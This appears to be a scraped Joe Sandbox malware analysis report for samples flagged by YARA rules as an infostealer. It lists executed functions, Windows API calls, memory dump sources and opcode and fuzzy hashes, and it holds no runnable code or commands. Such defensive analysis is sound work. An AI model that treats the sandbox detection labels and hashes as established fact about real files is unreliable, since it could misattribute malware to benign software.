Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	7

Executed Functions

Function 0A7D04D0 Relevance: .4, Instructions: 380
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6d5a514ac948bf5b32f1b31128f7e5cdf0516ac4e863f813ce611ebac74ac8
Instruction ID: 517537c625e230606a8fc06abe75cf2cdf52516f1e7ecdc288b66eec3829d6cd
Opcode Fuzzy Hash: 4c6d5a514ac948bf5b32f1b31128f7e5cdf0516ac4e863f813ce611ebac74ac8
Instruction Fuzzy Hash: 8CE16C74B112089FDB14DFA8D954BAEBBF6EF88300F158069E506AB3A1CB74DD46CB50

Function 0128D468 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0128D4F6
GetCurrentThread.KERNEL32 ref: 0128D533
GetCurrentProcess.KERNEL32 ref: 0128D570
GetCurrentThreadId.KERNEL32 ref: 0128D5C9

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5e6a675e792cf5e2f73ae8b8de846b85a534472bb7b13b76f39ef1c0447d3a73
Instruction ID: 9cac79516b12a9637df0c3c97d1e006c9cfe21831d425bb371d563540cb5e2c9
Opcode Fuzzy Hash: 5e6a675e792cf5e2f73ae8b8de846b85a534472bb7b13b76f39ef1c0447d3a73
Instruction Fuzzy Hash: E55188B09117498FEB14DFAAD548BAEBBF1FF88304F20855AD009A73A0D7749948CF25

Function 0128D478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0128D4F6
GetCurrentThread.KERNEL32 ref: 0128D533
GetCurrentProcess.KERNEL32 ref: 0128D570
GetCurrentThreadId.KERNEL32 ref: 0128D5C9

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cf10b4b99bfc1991b0db1adee298b2e01d45556aa183662db5fa14cd2ad6c920
Instruction ID: 6e92c0bc6bc6cbb822ad5d2d22ee912b755c213cd1886a391cc482a7e9b511e4
Opcode Fuzzy Hash: cf10b4b99bfc1991b0db1adee298b2e01d45556aa183662db5fa14cd2ad6c920
Instruction Fuzzy Hash: BF5188B09117498FEB14DFAAD548BAEBBF1FF48304F20855AD009A7390D7749948CF65

Function 0128ADE8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128B03E

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a6e6adecae4fe0690951728f315f18476b35a3c532ad997898b23a2a2a1a124e
Instruction ID: 2f82cfe770747bc2c4cec9e62520bd8c57c92568a4d2111c4228053dba4074aa
Opcode Fuzzy Hash: a6e6adecae4fe0690951728f315f18476b35a3c532ad997898b23a2a2a1a124e
Instruction Fuzzy Hash: 9E715770A11B068FE724EF29D04476ABBF1FF88300F10892ED14AD7A90DB79E845CB90

Function 01285A84 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4962eeb43484f5f5fa5af5f8544be4ba0c07f0be9278aa56d95805ff1f4187f9
Instruction ID: 3becfec6143ef136f8938181294142c6b67d637505beb9d2e56d6d2ace72f83b
Opcode Fuzzy Hash: 4962eeb43484f5f5fa5af5f8544be4ba0c07f0be9278aa56d95805ff1f4187f9
Instruction Fuzzy Hash: E841227181674ACFDF12DFA8C8843EDFBB1AF52320F144289C055AB291C7759946CB51

Function 012844B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 090a1d5ef57ccfb48ae31f28e179c98c4f0697c3f45a63422671f5cb74a9ee84
Instruction ID: d0e7d3bc05fa90a7251af6175cde24c2f89a6be825513dec526007fe2d6a9030
Opcode Fuzzy Hash: 090a1d5ef57ccfb48ae31f28e179c98c4f0697c3f45a63422671f5cb74a9ee84
Instruction Fuzzy Hash: D841BFB0C11719CBEB24DFAAC884BDEFBB5BF49704F20806AD409AB251DB756945CF90

Function 0128590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2f1a8fb4d713f663e28ec9a6d8694e3a7527fe09ac83ac938b0c359c7e01053f
Instruction ID: 30f2c858934eec2cede4c0896c498b35f73cf0c6f01307358ec9988414bbb037
Opcode Fuzzy Hash: 2f1a8fb4d713f663e28ec9a6d8694e3a7527fe09ac83ac938b0c359c7e01053f
Instruction Fuzzy Hash: 5E41F0B0C00719CBEB24DFA9C884BDEFBB5BF49304F20806AD409AB291DB755945CF90

Function 0128D6B9 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D747

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d81aab872aa16c20e1dd315f6abda2bcc59970ba6a368ca5cdcf892ea6334bdc
Instruction ID: a5ad217071a2b633cbe0c1ecf76fb12627ae3eae65ddfe5d0070451233d461d0
Opcode Fuzzy Hash: d81aab872aa16c20e1dd315f6abda2bcc59970ba6a368ca5cdcf892ea6334bdc
Instruction Fuzzy Hash: 2721E4B59012499FDB10CF9AD484AEEBFF5FB48310F14802AE914B3350C374A954CF61

Function 0128D6C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D747

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8d4ff9c6ee98f06a8258cf0f409b2e9960fa05c3a58e9c1eda0aa398ad49c99c
Instruction ID: ec6a421734c90a90f9e05d83b1ae952db341cb0d3e7c5decf76a2738f1e486cd
Opcode Fuzzy Hash: 8d4ff9c6ee98f06a8258cf0f409b2e9960fa05c3a58e9c1eda0aa398ad49c99c
Instruction Fuzzy Hash: DB21E4B59002499FDB10DF9AD484ADEBBF5FB48310F14802AE914A3350D374A954CF61

Function 0128AFD8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128B03E

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1a594241723c54cb43efaf23c293ae0302fc17eb90c5665ca05035c6eb7c4831
Instruction ID: e63b6ce19316612db3d16db5148a99011652a86c0dd6345675abb24119887db1
Opcode Fuzzy Hash: 1a594241723c54cb43efaf23c293ae0302fc17eb90c5665ca05035c6eb7c4831
Instruction Fuzzy Hash: 461110B5C003498FDB20DF9AC444BDEFBF4AB88324F20842AD529B7650D379A545CFA1

Function 0122D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443754773.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_122d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8249d7ce81abb93185b17c7d4e7943fde0c0253bcaf5a2a05430b2681b9c94
Instruction ID: b90c6e9108ae8e8401d5dc29721e66872834f4b3485d1e7f324c3501289d0134
Opcode Fuzzy Hash: 8e8249d7ce81abb93185b17c7d4e7943fde0c0253bcaf5a2a05430b2681b9c94
Instruction Fuzzy Hash: 73214571510248EFDB11DF54E8C0B2ABF65FB88318F24C569E9090B256C3B6D466CBA2

Function 0123D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
Instruction ID: 79420f7779e2a09527c4a4a574f872d46d1395ff90b7e9a9d47460154022312c
Opcode Fuzzy Hash: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
Instruction Fuzzy Hash: 352137B1524308DFDB01DF94C5C0B25BB65FBC4324F64C56DE9094B283C776D806CA61

Function 0123D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
Instruction ID: 4e92772379af90e0e9667d59318ca89136832ef9441eb043998ab2662271e339
Opcode Fuzzy Hash: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
Instruction Fuzzy Hash: 352100B1614348DFDB15DFA4D8C0B26FB65FB84B14F64C569E90A4B282C376D807CA62

Function 0123D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62

Function 0122D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443754773.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_122d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: 021389cccff17b09fe5c82ba03db643f7770754f46f0ff4957d84c4cddfc26ef
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: F6110376404284DFCB12CF54D5C0B5ABF71FB84318F24C6A9D9090B657C33AD46ACBA1

Function 0A7D0439 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4d33bf9d9246ffcfb8a9ef64fe4fe97c379c2a53c8dccf768efd6f32b701dc
Instruction ID: 184b0fdfeaf58e7f886e787a12d9c17d06213c943dd2829979a1a4b37919cb5f
Opcode Fuzzy Hash: 3d4d33bf9d9246ffcfb8a9ef64fe4fe97c379c2a53c8dccf768efd6f32b701dc
Instruction Fuzzy Hash: C21177313196808FD326CB79D864A657FB2AFCA515B19C4ADD149CB772C624DC0ACB11

Function 0123D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 652fb42ef3662e997fe01e63a0c6d3bd74b83d8597667452a5b80241330c423e
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: B611BBB5504284DFDB02CF54C5C0B15BBA1FB84224F28C6AAD9494B697C33AD44ACB61

Function 0A7D0448 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13bc5df2071c4700b4783dacef0fe6ebe06f3295773c993f74f1cf43c3db813
Instruction ID: cafd31893e9410f794c9cbdbd4e60e1d0908fb6e7939b4bfdfe0e28703517aad
Opcode Fuzzy Hash: e13bc5df2071c4700b4783dacef0fe6ebe06f3295773c993f74f1cf43c3db813
Instruction Fuzzy Hash: 36012131310A048FC728DB6AD858A2ABBE6FFC9625B15C47CD21ACB765DA34DC05CB50

Non-executed Functions

Function 0A7D1088 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920d346ec893a54ed60206a1e1dbb05ee1a1266cf0089c38df526cf74bc8a53b
Instruction ID: 7cd729189d65ca7791363c4eefa55229cdd426a221fccc81d38caabd21731c0e
Opcode Fuzzy Hash: 920d346ec893a54ed60206a1e1dbb05ee1a1266cf0089c38df526cf74bc8a53b
Instruction Fuzzy Hash: 68D1CC707013048FDB29EB75C454BAEBBF6AF89200F54856ED146DB2A1CF35E90ACB50

Function 0128D3A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a84625b7be44253098555abf28ee0d33ea50357096f15091c18c97c39c3dd685
Instruction ID: ff9bd3c88940344bc76a7c141a9548c7c38007189d18d05884f4a355129031e5
Opcode Fuzzy Hash: a84625b7be44253098555abf28ee0d33ea50357096f15091c18c97c39c3dd685
Instruction Fuzzy Hash: F1A1A532E2121ACFCF15EFB4C5445AEBBB2FF84304B15456AE901AB2A5EB31D916CB40

Analysis Process: iWEWjTXiqXke.exePID: 8176, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	71
Total number of Limit Nodes:	8

Executed Functions

Function 00CAD478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CAD4F6
GetCurrentThread.KERNEL32 ref: 00CAD533
GetCurrentProcess.KERNEL32 ref: 00CAD570
GetCurrentThreadId.KERNEL32 ref: 00CAD5C9

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6369fd811d24a3d23ed26101b978d18da82022ee7754bed6eda52c50795aaa1d
Instruction ID: 0f985f61660fecad61139fdd1a47dacd1f93c3c515294fff65bc1dc181ec225f
Opcode Fuzzy Hash: 6369fd811d24a3d23ed26101b978d18da82022ee7754bed6eda52c50795aaa1d
Instruction Fuzzy Hash: AE5156B0D012098FDB54CFAAD548B9EBBF1AF49308F208459E01AA7390D7749984CF65

Function 00CAADE8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB03E

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6262ebbd8b81d9cc8d3a2af632ac5fb89aa04e9b010425ed01f88e4e9ab73cc7
Instruction ID: 8ce09d1737f3ee2b80cc9021aaebbb9ea1fd0e2e5c7e8da3862174b40ab17c65
Opcode Fuzzy Hash: 6262ebbd8b81d9cc8d3a2af632ac5fb89aa04e9b010425ed01f88e4e9ab73cc7
Instruction Fuzzy Hash: A2716470A00B068FDB24DF6AD44179ABBF1FF89304F00892DE09AD7A40E775E959CB91

Function 00CA44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA59C9

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 80dc212190041384c452a123d62b9003e647acc23f10204b979172195d14f035
Instruction ID: 6fd8ba76270745f7a45b1f427d21021c14844446a6f3a243692cf67ed27437e3
Opcode Fuzzy Hash: 80dc212190041384c452a123d62b9003e647acc23f10204b979172195d14f035
Instruction Fuzzy Hash: 4341E170D00719CBEB24CFAAC844BDEBBB5BF49304F20806AD418AB251DB755945CF90

Function 00CA590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA59C9

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c8c26a37a8f0186defad34e358ac1002a05172f390565ac66a6aa348dc6b93fd
Instruction ID: 9e19a12046450fd44dd63d17662b712cb65af0e0784752c3effa69a4ceb9144e
Opcode Fuzzy Hash: c8c26a37a8f0186defad34e358ac1002a05172f390565ac66a6aa348dc6b93fd
Instruction Fuzzy Hash: 9A41EEB1D00719CFEB24CFAAC8847DEBBB5BF49304F20806AD418AB251DB756946CF50

Function 00CAD6C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD747

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 59c5f17257f1d5e2da9fa027ddadf9c5b620528b9d22498a21f8845a2d415aa2
Instruction ID: bd6c3b74f849a62fbc74fcfea233bca15bc47d58a573a0f282f9f1a0d8f05dbe
Opcode Fuzzy Hash: 59c5f17257f1d5e2da9fa027ddadf9c5b620528b9d22498a21f8845a2d415aa2
Instruction Fuzzy Hash: D621F3B5900209DFDB10CFAAD984ADEFBF8FB48310F14801AE919A3350D378A940CFA5

Function 00CAAFD8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB03E

Memory Dump Source

Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 85e3b0109935629e33c83a83ffbdf08d61e5f5e72463ee759fddce7a63c5f64d
Instruction ID: 4bf21a6be9c42b880f7b735f6d7256b70a72c27906603f2058c1617660138d90
Opcode Fuzzy Hash: 85e3b0109935629e33c83a83ffbdf08d61e5f5e72463ee759fddce7a63c5f64d
Instruction Fuzzy Hash: 82110FB5C006498FDB10CF9AC444BDEFBF4AB89314F10842AD528A7700D379A945CFA1

Function 00A0D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570503323.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a0d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2087e89f0bf0798cd09cf27e0c127445778ee8497cb75d619d46262ec0b90ee7
Instruction ID: afa8b581c452fd9a5ee8d4ddb2206b7b66b9aed06b105e3478f92741dc591644
Opcode Fuzzy Hash: 2087e89f0bf0798cd09cf27e0c127445778ee8497cb75d619d46262ec0b90ee7
Instruction Fuzzy Hash: 18213A72500348DFDB04DF50E9C0B26BB65FB94324F24C569E9090F296C337E856CBA2

Function 00A1D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689f1719fe13f6fdea3ec04d692d30388bc07a5dab841ebca62bee1b5d930ffd
Instruction ID: 5b3ff9800fca4c67e7346b19fc8b33de16559b1f9e2f9836b35d798cb74a4055
Opcode Fuzzy Hash: 689f1719fe13f6fdea3ec04d692d30388bc07a5dab841ebca62bee1b5d930ffd
Instruction Fuzzy Hash: 04210471504344EFDB05DF10D9C0BA6BBA5FB84314F34C6ADE8094B292C336D886CA61

Function 00A1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4616d6fd56ba4992532b21c986e2c9c293b9820d7edfa0aa64c4754dd62b1d0
Instruction ID: 8a975657e1041a4e0798e6eea3b60a8ca53448514f6da490f4da6436278a80c6
Opcode Fuzzy Hash: a4616d6fd56ba4992532b21c986e2c9c293b9820d7edfa0aa64c4754dd62b1d0
Instruction Fuzzy Hash: 0621F275604344EFDB14DF14D9C0B66BB65FB88314F24C5ADD80A4B286C33AD887CA62

Function 00A1D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e67edbf421b7f4e2b5165f17717861e21a283d04440669561dfdf0dc3e6dba67
Instruction ID: 17effce3fedd7d5b923703770c92e3f6c9e6bcbb91c53373f72790ce3f706886
Opcode Fuzzy Hash: e67edbf421b7f4e2b5165f17717861e21a283d04440669561dfdf0dc3e6dba67
Instruction Fuzzy Hash: 57219F755093808FCB02CF24D990B55BF71EB49314F28C5DAD8498B6A7C33A984ACB62

Function 00A0D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570503323.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a0d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: 225b7eebf879ab7a9b8a59d22cecd22a905388ec772cc2eb2cf9a4d8a0eb7fb0
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 14110372404244CFCB01CF40D5C0B16BF71FB94324F24C2A9D8090B696C33AE856CBA1

Function 00A1D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 2bbfa41b65617d84d3b2c05446ab60dae23abdfa872b142463f5112248d0b562
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 9B119D75504280DFCB15CF54D5C4B95FBB1FB84314F28C6AED8494B696C33AD88ACB61

Analysis Process: iWEWjTXiqXke.exePID: 616, Parent PID: 8176COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
